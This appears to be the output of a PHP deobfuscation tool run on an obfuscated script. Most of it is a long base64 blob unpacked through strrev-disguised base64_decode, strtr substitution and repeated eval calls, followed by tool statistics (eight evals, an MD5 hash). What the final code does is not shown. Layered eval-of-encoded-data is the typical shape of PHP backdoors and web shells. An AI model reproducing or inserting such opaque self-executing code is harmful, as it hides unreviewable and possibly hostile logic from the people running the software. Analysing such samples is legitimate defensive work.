NNmdBd2dGclhabV1mfVE5Y3N2bDNzYzltcD13XUxGN11vOVpYWmMzQ1pZPmNvUnB0L1o3ZERGXTMvWTNPbkQya1pOXT1TRkZ0Vy9dPWYrXVF9Tl1YUGM5Uy9aXWZIcUFDRHNGZnpOMmtuWl1PSERsL1ogM2R9THBrOVlzSGY9QTNJcEFjWFFBPTYvQXRqaHAvWS9wNXNrVDNxTjNZSXF4L0lCQV1wTDNbcD0zbWZMOWNZNVNIWE5zWS9Cc0hZXWwvWnA5UVdMQS8vcl1lOVJ4WFluWj1TdzlPanpwNXo9bXdnTmxtUzJdWS9YPmNvdTczSXNBZXN1XUNZWTNtWURGLzFvc09wTW1rWW0za3IrQW1mUT5NWWM5bW5CRmZuW3AvalFzZlpjM1MvckE9WVIzZXBNbFhabkFPblp3M3JRMmZZRGxdWmp3WHI9eE1YKzdTWUE+Y2dLMz1ZQUFPMkxdUWd4N2YvbHddSEI+L0hSXS9ETj5pZzVtW0xbQVl6dEZYUFh5Yy9ucDNZQlRDMnRddFpOcE1dTnddWm14WDJGbVMxTHBYfUxsMy9Jc1tZUjMgZy9zNVljczUvN1Rdaj1wWHFMM09aTm1rWjd4WHBRRi9ZWHBZZm85IDF6M2YyRngvbls3ZlpjbENaTz5DbD1dPVlUN2RENW1baj13My85M3d9ej5ISGs+PVo1eHRjK11RZ3ZzNXNnN0NEWm1IWVtDU0RNeVsvRl1rWkFBTy9GXU02PXA9UzJ3WEhZVENaRFpDcGd5SFA9PltMcjI9alEyQ0RrQ1NQTlRtbkJBNWdbQ1NEeFRDbEw5ZVByPl1xUTMzNi9sUy9rOW1uT3BZbnRyTTZMc2RnMkZdcD1BY0w5M3d9THAvL045NVhON2ZqKzMvSXRUQ3M1N1MvQlRdMiBwWG9YeTMvRkY9Zk4zNS89Mm1ZIENdWFFGW0xqXWtERDJTMS9sM3NrbUgvWndDakxdMzlNczVTbDM9cHo+dEh0d0hJNTdZSGt3PW4yeD1qPUMzZ3NzWVA9N1NzOXhYTEZGWHN2PlFXUTldWlJBWVk5eC9JeHBZZk5wT1o5QS9jUW0vWVJsPVptcDVJakFbL0RaU1ovbG1aRj5jcD14TVo2eFF9UTkvUkttY2M9QU1yTHhRZ3NBXVB1N21MckFmb1I3XVBOeTNZa0FbTEI3T1hobE1wZ3AvUD1dbUxPXUgydEZYc0RDU0hjOV0ycjNtUz1tL1BONzUvRmxtWVt3ZVNbbE1JaT5bU3dBZjJbc1tZOTI1TDlsMy9qQVgyQncgNittL0lEVG1aPV1tbjdtZURxWkNEWjc1LzJBXUhCPlsvdW1tblFzWVkyd00vT3JYTCAzMzZncC9aMlpDWVJdUWdtRlhzREEzWk5qZVBabWVERHJNPk43T1oyWnQ5T0FPZlFGQy9UPkhZL201L2o+PTltM1syMWwvWjJTSFpBeFhaIDJTPmdDM3VMWmZITzJrMT1tLzFnPkhmTl1rRFt3W1hRWl1xLzdkZzJaQzlCc2NIRlpDWGdsUy9sd1NaTzJYWlJtU1kzPltabENtOTk+TXArMyA5cTNmWjJaXXIvMnRzUmwvWnFdTVprbE0vWjNtbjkyM0w5Wi8vPXc9THIyPVNSM01JVkNTZlFDMy9yPlgycW1TMVFBbV1veFhyL11ZLyBsL0lxeVNSRncvWkIzMy9ERlhQcEFpZ3FtT0xaXTVMUmpIRG5wZn1Rdz1aQTMzL20zLzFnXU1TS1pTc20za1NEcC9JcWxNL0Z3PW5tMzUvPTJtWSBDd2cyMmZIN3hRfT1tPVlbcDUyb11taj0+NWcgaml9TnBYfUxtWFptcENzbXgvRGtwWFhOQT1aN1RdcFEzbUhYXVFnbDJYMm0zT2ZMM1Nud2xTUGw+bW5tMllIXUNTMS83ZlpLOW1aWXhYWURdL2YveV1wTFNmMnJwWW50MkMxZ2xtcFFBdFo3eE0xTDljc1s5PXBRals+PXA1Z0YzIDl2QVtTNXg9Nk5wa2w9alsyVmxNL205XUhyPjU5bW1DSXM5WFAyPmNIMndbU3QzU253bFNQbGxdSFt3Yy85bTNnUWlZWnddZkhacGZZUng9TE5zNTJGQTUvang9amg5TT5nc1lQMlpTMU4zM1JSbD1MazlNXUxtIHFOPiBQTHA9ai9GYy9sd21uNTNDSHZqSEkgM2Rnd2w9TFtzY0htbW1uQVpNLzJUU3M5eHRqK11YWUQ+TVljQ11IbTJmTHF4L1BzeWl9TjNtWnQyL3U9M01Mbmx3RFFdbUxaXWNmKz5dWSB5ZXNGMyBvW1RtU3QzU253N2Zaaj5tcE5UM2dEMllEa3kzUkszT1pZd2NyPTMgb1ZdUVdOcGt6ZzNPWXEyID5McFlaNW01cU55WUggcE19Lz4gUkZwXTJbPiBQIDJjcyBDbVNsXU9ZbXBDc1F4UWcgM1lIYzldMllzY1k5d1tucENdWE1GW1oyM0hIbW1NTERBUz5vbVtuQl1YTFtwL2pReUhQRjNlPj1aa2xRMl1ZS3NkV05yLy9qXVlqK2xYUG9wUX1MQVhINV0gPkx3SEkyU0haSz5tWlpBTWddXS9JeHM1L0ttPVp0Cm0vW0EzSVRsPVptcGtQcjNrbnFaU1kvcGZnSzddcnozbS9JM21IVDdrcz1zW1lacDV6PW13Z043ZlpjbFNaWHdjUnQyd2czNzVyTj5PTG13XUg9RjM+THBPU3BabVlyMzUvcUYvSWlDXS9ObSBxTj4geittbW54c2ZaRnBramd3Y1J0MndnMzc1ck4+azltPk19PTJ3Z0RsXVpqQT1Mal1mcCtwWG92aWZaPUFtblIzQz4rd0huLzdmWkZaPW41Pl1vOXhNMlZTSFpGck0vQTMzWFFdXXMvcE9dTXlmWltUU3JRMmtEa1NIWnJtIC9tXSBMbTJdUFFpZlpjbFNaWHdlSCBsdEQxczVzY3NZL0JzY0hEMl16Z0FdWFE+SHNtM09udjMvWVI+TVpvbUgvWjdrSURqW254RmZ6TjllZi9wWVI5Q0NwdEFjcExaQzkyXVluRDNIRERsXVpqc1kxTlRDamhdL253N1lwbzllOWozNS9MXVFncUZZUkY5SC9PPj0vIHgvSXFDU1BnXTNZMj4vdVEySG5vbFNaMj5jcnozbS9JbS9ZQT5jZ0twbVlacDV6PW13Z05wWVluVENXL3BkV3RdPVlRNzVZYzlNL0FtSG5tbUNuWHA1U25BWVpZd2VqaF0vSVJsPXBRMz1ZQTNtPnQyIDkgQW0vcDNbZj1dNVhRXVhZWnM1MmxGPVo5cj1YPTJDWkFBU1pGVFNzOXh0biA5SFd0XVFnbD5dMls+IFBdQ3dnIFovcE4zT1o3eFhvOUFTZlFBIC9GPk9ZTzNZSTl4L1BwQVNabGxrWU8yUX09bT1ZbjdrY29tIC9tcDM5W0N3ZyBaWFoyPi9zbTNdc3F4L0RyQUh6TkFdWlIzUzE9akhqTUF3fUw+TzZ6M0NTNjllV043WVBLWmtEWnBdaiszLzFOczVaRj5mSDVBPS9SbUNuTmxdfU5aXWNOd21ZcVptanpDMy9wQVlaWXdlamhwWG9EcDVSanNPWnI+dER1XS9XUT4gUmNdT1o5QT1IIEFdb3RsU1lqQT02PUE9WXEyIDlwQ0NzSzM1cWd4PW5SMz1mdD5ZUE5tW1lYd21dPTNTUHNwNXJRPnRQWj4vL3VtQ25ObF1Qcl1DUFgzM1grMmRnQVovWjI+SElyMlhnUjJTWVh5bV1Rd01JWXhNTEx3SG5bc2tzQ21rUG9wd1JxXTM+dD5jL3dBNVk1PmM2UT5dWSBzNS9wQWYyWVRtU3QzU253N1kvTjdtcD1tZUR1N3d9UUF3RDJaQ0RCeU8vOW1tMjFsTS9tOUNQWDNTaj1qID56VF1QNUZIczkzT2pMbVNEblNIL2s5W3B6d102TDNIMVFDQ3NGbT1ZOUE9WFEzU1lxU0haRjlmMlpdSGpMXT1IWHNmWkZTW0xqXWtdK3AvRERDbS9tVFMxPT5dTExsPVl1cFhnMndtTFt3SG52M1hxTjdkREZtZjJYXWNIbW1tbjlBZXNtU2Vmej5NfStwWG9EcC8vbl1PZmdwZH0rakhZL0EzUzVta1k1XU9IRF09WXQ3NVpsdz1uMndTdVFtWHpvVF1YUUEvL1p4TXA9d0gxUUMzU0s+QzlqeE1nRHBRZ3M5L1l3XU82PXBZUjZtU0lOcC9Zd2x0RFJUXWo9cHRqZ1RDc25aM29SeFhwTEZYc25wa3NLcF1IOT5NWCtqSFlCN09TbF1PWW1wQ3MgbC8xZzdmUHc5bUxtdzMvRHlmWS9wZmdLRlNaWVRTMnRddFpOcE1dTnd0PnozNX09M1NuT3llbEw+azlJMj1mUVptSE5TSFpGck1JWV1lWkxabWpMVF1YUXg9TE9dSHJMbFhzdjc1MjJDbUxtXSA5RDJZREJGbV1OWi9wTl1lSCBwdEhUN08vbTczb0J5Ty9EMjV9b3NPcFFGW1paeE19UW0vWVJsbVM1XTNJakFPcCt3SG4vNzUvMkFdYy8zU3U9amNvcVR3Z0ZwNUlBVF1qUW1YemdwT1Nwd202TjNdZ3FwPTJUeW1Td1pPcE5UXW45bTNyQlRdWmN3bT4vMlhSOXA9ak43ZERGd01JTz41PlFtWHpNQ11aakF0RDJ3W11MbFhzbjdrc0ZwXUhbXVgyRm1TZmdGM3VMVF1IMnBZdXRdL2YvbDNaa2w9WllzY1lERjM+ZzNmWkZGQ1lBM2syMTlIPmdUbVpsMz1wem1lVyszID4vPltabmxrOWpwWXV0XS9mL2x3RD05azltPk19PTJ3Z0RsXVpqWm05NTM1TElGPVl3OVFEMlQzWE5UQ2orakhZL3llc3F4PUxyQU8ycW1tSGk3WVJGeFgyTzNrbkQyNX1nQV0vUUFYMkJ3M0w2OWNzd0FTUm0zPXB6cGZMRHdIWU1wZERsXU9ZbXBDc3ZqIH1vN2REMlNPbjdtSFJ0QWNZWGxTL2x3XVo5MlhwPXdjWUQ+UVcrN21acj5NOUkzU25bcGZncDN0OXV3Q3NEQ1NEbmwvL2tsPVpqd11IbTNpZyBzZi9OQU9aWnhNfStsWHNEXXRzanc9bjldW1p1eC9XL2xdL05wZjJCd2NyPXg9WWlsXX1OeD1aN1RdcD0yd2c5QWNYUXBDRGZzZTlSakhEblpYfU45azlZeC96dDIgPmdDU1lxeU9abXhYbyBBXXFON2REMlNPbjJ3bVlxWm1qekNDOWsyWUlyMk1JdVpTZlFwZi8ybWNaW0FrRCBqSFl4bF16TnBmYy9aZnFMbV1ZSzdmUHcyPTY9WmZMPTJtZkxwWVk1bWZIN3hYWm1GWHNuU1taTlRtcD1tY1JEM116LzkvWj1BPVpZeC8vdW1tam8+IHNjOU1Yel1jZnRtUWdNOVFXTF1PTEI+WHJMcj1qUTdZelF3Ly9bdyBnRDNTblJGWVJ2eU9ZbUFZSFI3bW5UPk1SakE1Zi9BWGo9OVhzOVRDc24yZmM9XU9uIHBYWTVwNTIyQ21MbV0gOW1yLzEvc1lSdnlZLzVBPUggQW0ya3M1MmxGL3NSbUhQTFpTak1wUX0rMlgyNV0gPkwzPTJUN2RnS0EzSWozbVlMXS9uWzM1UmN3bTkycDUvOXhRZ2k3ZlB3U082PW1jSDldUzlzRjVTbTk9TDUKXS9EM1tuTjlNb245XXJOMmtJbTJtWTNwZlA9XWtuczI9L0ZsL0lJc09TPVptTG0+WEhtN11QeHBZL2xwTXFOXVtTRG0zfVFzNVJPOVs5bVRdbm1qIHFCN1laPWxTWlo+ZFJ1MyAyMVRdWE5GZjJteD05bXg9bm9zNS9wbGZyenhYWkZGWHNuU0haRnc9OW03ZlgrakhZL3llc3F4PUxyQU8ycW1tSGk3WVJGeFgyTzNrbkQyNX1nQV0vUUFYci9dNUltMmtEa3A9cFE5bWp6dzNMIGppfU5wWH1MbD1aWXh0SHR3SElSXS9SRjczWHpdY2ZRMmZZRGxdWmpabTlCPj1TIDJTZkxsMzJOOW1wPVQzWUxdL1BaN1labmxDWkN3U1I5bFhZaVRdL21wa0Q3QWZnRDJjbEwzZlpLbVkxZ21ILzkzTXJnbDNTajNNcU5wXS9EM116LzkvWXddT0xtcENzdmogfW83ZEQyQVtuNzNTUjkzIH1McDVTblozcU53IFpSM2NQQVRtWndqW1lqM11MXUNTMVF5Wy81N11IT0FYUjlBbW5Lc2RXTnIvWE4zWWo9eC9uNnA1dU5BPVoyeHQ5dW1NNi83NXNrbWVXTkFrRFtDMzlPRll1TF1rOU9Ba0h1M0hJREFIWUZaT1pYQzM5PXdbbnA+aWdLPmNIWV0vLzkzdFdCXVhQQ21jWltBZH0rakgxTXB0bFEzdD49cGtjUV1NMnNdUVdORmtaWXdbWnRGMz5neVNZbDI9Ni9BdGpobFhzRF10c2o+bW5tM2tEXUNTSVJwNVJDN1MvVnBdbzltbTJWbF1QMjlrVz1dSGpMXT1IWHBRfUxBPUxqXTVaNjlIWUFDU0hnXW1acl0gWXV4L0R4QTNTMmxPWjlBZm9bcD0yVmw9WndwNVk3QWZjUW1Yem9sXVptc1kxTl1mcCtsWHNEPk1Za20gcU4+Y0xxM1NudkEgMnEyPVo5Pl1vOW1db243ZlBGbXRXPV1IakxdPUhYcFF9TEE9TGpdNVpMcj1uckNTUE5UbW5Zd21TdTkgb3BBbS8yM0hzW3A1L3QzWFBLXU1Taj56SVtzY0htOWNQb3BZWkY+SHM5MzVYUUYvPmdDQzFvbUgvWlprSUR3SFlNPltabF1PWW1wQ2w9eD1ZTjdmUHdyWEhZM21mKzI1Z3BsPXBvQVhIQj4vMkQ3bWYvPiB1K11tWnJdIFltck05T2xDczJaQ0RScGtzOTNlWnhsU1lqWkM5Ml1ZaitsWFBvcFF9TEEvWkEzTy9SakhEbnA1Mm5sXWM9Mk0xPW13Z05wWH1MbG1uWkEgUl1dQ3BocE11KzNbWW1BNVl1Ri9ZXUYgZkxtSHNSclFSTEFTZmgzWWZRbVtZOXBmc0tdMzJoeVMvcGpbWnR5NTJbeFhZWEYgZkx3dD56NzVQREFTWlJsM1grN11IMlNRUlJdUWdGcE0ybEY9bjdGT1g9Mk8yc0ZmUHJBWEg1XSBSSTN3Z0ZDd2c9cF1IW109U3VdMzlCXS9SS0FtNno3ZHVMMlNJPVNbWm05a1c9bSAxUT5dWXczWVpGXWtmejJmb3E5SFlSbC9abF1Pai83NTldbD1ZQmxdUG5aU1gvPk0vdnJNZ1QzWUhDXTMvWz5lMT1ad2d3RmZQS3BTc1IzYzZRQW02TlNIWFFqW2ovWmZvcXh0SXNsXWd2eU9MUnh0SG0zSFlPXVFERj5DWTJwXUw5clhvY0NtLzJGT2ZOXU9uRm1NTHdDd2dubSAvWjNrWkxDd2d2N2RncngvL0FGZm8gQzNnS1o9U3dyPW5abWVwK3AvbiAzWXBOU0hJcj5IY0wzd2dpN2REa2pbWlg+Y0xGbW1uQnNZUjJBdDk5RmRSW3BYb3ZDU1BrQUM+TnBdNj0zQ25YRjVTYz5jYz1wT245XS8xTDdkZ0NoTUlqM20vOXhYUE8zZlpLMjUvWUFPLzZ4PVlOeVMvbDdDWkN3bVlxWm1udz5kZ2M5PUxBQ11vUm0vMVFDMzJubSBvWDNPMnVdL24gU1tab21PWm13Uy8gQV1vS11NcE5BMy9bRk9YK0FdUHg5UVcrRmNIUl1NL0RwL0R3VDMvdUZNUHQyZjF0bTMxWG49dWZDL0l0WmVTd2xmbkxtZHpreW1mbzdrZkxDPTIzeUNTIGx3PklUdFlUc1lmMW5IZ0Y5UXprQWZQa2k1WC9dTVh0cE1MbDdmLzltU0lqMk1yUXAvSVRwZEQ5cDNMajJxSTltU1pdRiAvLzJmcE4yL2xRXXREazdrcz1dbVlZRk9IS3cgPmhBbVNtQUNQSVRtWkxdLy9yQTMyazdtWXQyTW9GMlluZl1RRHBBPT56cGYvPWpISVJBd0R3RltmZ3hNXXRabVkgczUyS1RtWnJwNTZRamVjZz5IOW5zSHNPPmVJRngvRFRsU3BMd2U5QTNtclFBU1pGeV1nT11DWVp3ZVo5WlNXUVQzWXB3bUxCcyA5S11DSEIzT1M5bU85W3BrMjlGdEROc1lSPXg9OTUyTXpMPl1ZaTdZL0t3SFo3XVhSRngvSTNaUURxbSAvNTNTSG1DQ1psN2REMj4vWnNzW1NRMmNvUT5RZ0M+Q1lqPlhsaENtbjVBM1psXWtXL1RdNj0zU25oeV1aPXljSEEzT1l1eC9ZRlMgZit3U3NaXVgvUXB0Y29BZlBraTVYL11NLzFBQ11YblFmSVQ9Z2QnOyRfWnc0dVJCQnlOKCd5OTE+eTlfNlZ5dUZBJyk7eU5GWSgkX1p3KCduSGcKbTVTbTczblA+TV1NWkhnZjIzWk4yIF0xbkhnCl1NU1RobXVmQy9nVDJTcGc+dHNROWVqMW5IZwptNVNteGk5M3lTXVhtZmc9OXdnbFpmUmRTIExvNyAyTXMgWm1tIFJoOT0vZTc1OUZGZm45M1gybjIgcT1wV0lEVGNwelovUE5BUzlId1tZNjJtU1p5T2NReU1Ic101UDI5aUxJPmtEZ25RcWtaNV1ON0Mydl1rcG9GW3MvN2ZnaDlxSUI+XW5IU09TS1ovWlY3IHBMbWZZUVNdc1A+IFlzU1FENXJkTHJzL1dxeUhzRApdMmZtY1BScDU5TjNZUkp5Q3N4QVtaOWwvWVpUaT5JVE1TTXIzcTFuSGcKbTVTbWhtdTQnKSk7P2I=';$_NS=strrev('edoced_46esab');eval($_NS('JF9fTmVTPWJhc2U2NF9kZWNvZGUoJF9fU2VOKTskX19OZVM9c3RydHIoJF9fTmVTLCdWeVU0Tk9zdS9QNktiVG5xPGZ2RGNTTGtKdz1HPmdaakJdW0ZJZGwzMApBOEMgN1hvbVdFSDl4ZTVNejEye2FRUmhZdC5pcnB9JywnNmUvPXZqUnMxaDR1Pk9KdwprcUJFVjVuN1N6PGM5TklyVURhcGlRVyBmYi5YR1AweFRBfUZkTEhtMmdvWlt7eXRLbDNdQ1lNOCcpO2V2YWwoJF9fTmVTKTs='));?>

Function Calls

strtr 4
strrev 4
base64_decode 8

Variables

$_NS base64_decode
$__NeS ?><?php // segdfggvny, tmb kirshoz function _p($array) { ..
$__SeN P2JHP0lQSQ08VVUwdXl6w6k5CsO8enpOw6lrUSwwUsO2NUEwZmTDrULDoXXD..

Stats

MD5 b62e9c49cb1ffa43b65ffe79b18bbdc2
Eval Count 8
Decode Time 2062 ms